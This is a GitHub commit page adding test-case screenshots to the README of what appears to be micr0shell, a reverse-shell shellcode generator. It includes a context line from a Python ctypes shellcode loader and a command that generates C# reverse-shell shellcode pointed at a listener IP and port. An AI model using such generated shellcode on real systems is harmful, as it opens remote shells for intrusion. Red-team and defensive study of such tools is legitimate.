Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
senzee1984 committed Aug 23, 2023
1 parent 9878e5b commit 0b0b2e0
Showing 1 changed file with 16 additions and 0 deletions.
16 changes: 16 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -206,6 +206,22 @@ ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

## Test Case

### Shellcode Bin File

![image](/screenshot/msf_include_00.jpg)

![image](/screenshot/msf_null_free.jpg)

![image](/screenshot/micr0shell.jpg)

### Simple Shellcode Loader in C

![image](/screenshot/loader_msf.jpg)

![image](/screenshot/loader_msf_include_00.jpg)

![image](/screenshot/loader_micr0.jpg)

```cmd
─# python3 micr0shell.py --ip 192.168.1.45 --port 443 --type cmd --language csharp --variable sc --execution false --save True --output sc.bin
Expand Down

0 comments on commit 0b0b2e0

Please sign in to comment.